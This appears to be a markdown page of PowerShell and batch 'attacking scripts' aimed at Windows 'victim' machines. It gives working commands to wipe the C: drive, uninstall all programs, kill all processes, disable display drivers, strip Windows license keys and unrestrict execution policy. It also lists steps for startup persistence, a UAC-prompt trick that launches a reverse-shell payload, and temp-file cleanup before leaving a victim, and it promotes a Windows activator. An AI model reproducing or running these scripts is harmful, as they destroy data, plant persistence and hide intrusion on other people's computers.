PS-020.md

Here You can Find Attacking Script's to take down target

⚠️ Warning ⚠️

Test The scripts in virtual Environments . Am not responsible if any error or damage occures to your main

All Script's works in Latest Version of windows

Note : Some scripts and codes may requires Admin! while working on with kernel Mode !

EFFECTIVE AND EASIEST WAY TO START YOUR PROGRAMS WHEN SYSTEM STARTUP Down

1. Save process to start specfic script when windows Boot up [OLDER VERSIONS]

$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "C:\Path\To\Your\Script.ps1";
$trigger = New-ScheduledTaskTrigger -AtStartup;
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "My Startup Task" -Description "Runs my script at startup" -RunLevel Highest -Force

It should contain payload at same executable computer !

1(a). The payload was saved Via variables ! [OLDER VERSIONS]

$payload = @";
Start-Process powershell.exe -ArgumentList "Payload-Script Here";
"@ ;

$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Command $payload";
$trigger = New-ScheduledTaskTrigger -AtStartup;
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "My Startup Task" -Description "Runs my script at startup" -RunLevel Highest -Force

1(c) . New Method

New-Item -ItemType File -Path "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myscript.lnk" -Value "C:\path\to\my\script.ps1"

Replace myscript with the name you want to give to the shortcut, and C:\path\to\my\script.ps1 with the path to your script.

2. Format or Delete C:// Drive. (Win 10,11)

Get-ChildItem -Path C:\ -Recurse -Force | Remove-Item -Recurse -Force

It Requirds Admin . Dont even exe this script on ur system !

3. Uninstall All programs in Windows PC

Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, UninstallString | Where-Object { $_.UninstallString -ne $null } | ForEach-Object { Start-Process cmd -ArgumentList "/C $($_.UninstallString) /quiet /norestart" -Wait }

4. Remove Windows Activation Keys in Seconds !

Check Weather Key is Activated : slmgr.vbs /upk

To Remove Key : slmgr.vbs /dlv

Tips : To Reactivate the Windows . I Have Created Powershell script which might be helpful to you if you are a os hopper . Windows 10 Activator

5 . Get an Reverse Shell As Admin (Luck):

start-process powershell.exe -ArgumentList "<Payload script Here>" -Verb RunAs

This will Run the payload in victim machine . once the Victim gives yes . The payload will Enter and will close , but we got an Rev, shell !

6. Disable explorer.exe temp

Get-Process explorer | Stop-Process -Force

7 . Remove OEM , RETAIL and Volume Keys From Windows .

Click here win-keykiller.ps1 to download ps1 script . this Script removes All Types of Windows Keys.

To Activate Windows Keys Again . Use My Windows Activator that activates Windows in Minutes . Windows Activator

8 . Disable Display Driver using Powershell

$displayDevices = Get-PnpDevice | Where-Object {$_.Class -eq 'Display' -and $_.Status -eq 'OK'}

foreach ($device in $displayDevices) {
    Disable-PnpDevice -InstanceId $device.InstanceId -Confirm:$false

    $disabledDevice = Get-PnpDevice -InstanceId $device.InstanceId
    if ($disabledDevice.Status -eq 'OK') {
        Write-Host "Failed to disable device: $($device.Description)"
    } else {
        Write-Host "Device disabled successfully: $($device.Description)"
    }
}

RUN THE SCRIPT AS ADMINISTRATOR

9 . Run your Script at Windows Startup !

@echo off
powershell.exe "C:\Windows\Temp\ps.ps1"

Save this file with extension .bat and save the Files in any of these 2 Paths .

• For all users: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
• For the current user: C:\Users\<YOUR-USer\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Dont Forget to change the path !

10 . Delete Your Temp Path

While you are testing some tools , running some scripts etc . It is important to del all the temp files before leaving the Victim Machine

Script -> Link

11 . Check If the Shell is Admin

Method 1

$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.
WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrato
r); echo ------; $isAdmin ; echo ------

The above command says True If the Executed shell is Admin . Else it will display as False

Method 2

function Check-IsElevated { $id = [System.Security.Principal.WindowsIdentity]::GetCurrent(); $p = New-Object System.Security.Principal.WindowsPrincipal($id); if ($p.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)) { Write-Output $true } else { Write-Output $false } }; if (-not(Check-IsElevated)) { Write-Host "Shell : Not Administrator" } else { write-host "Shell : Administrator" }

The Above script is similar but it will display as Administrator if its Exec at Admin Shell . Else Not Administrator .

12 . Remove All Windows Features

Get-WindowsFeature | Where-Object { $_.InstallState -eq "Installed" } | ForEach-Object {
    Uninstall-WindowsFeature -Name $_.Name -Remove
}

Removes All Features provided by Windows

13 . A Mini Script to Kill all Process

Get-Process | ForEach-Object {
    Stop-Process -Id $_.Id -Force
}

14 . Permanent Execution policy

# Execution policy for LocalMachine
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' -Name ExecutionPolicy -Value Unrestricted

# Execution policy for CurrentUser
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' -Name ExecutionPolicy -Value Unrestricted

# Execution policy for the current process
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' -Name ExecutionPolicy -Value Unrestricted

Unrestrict the policy via registry entry .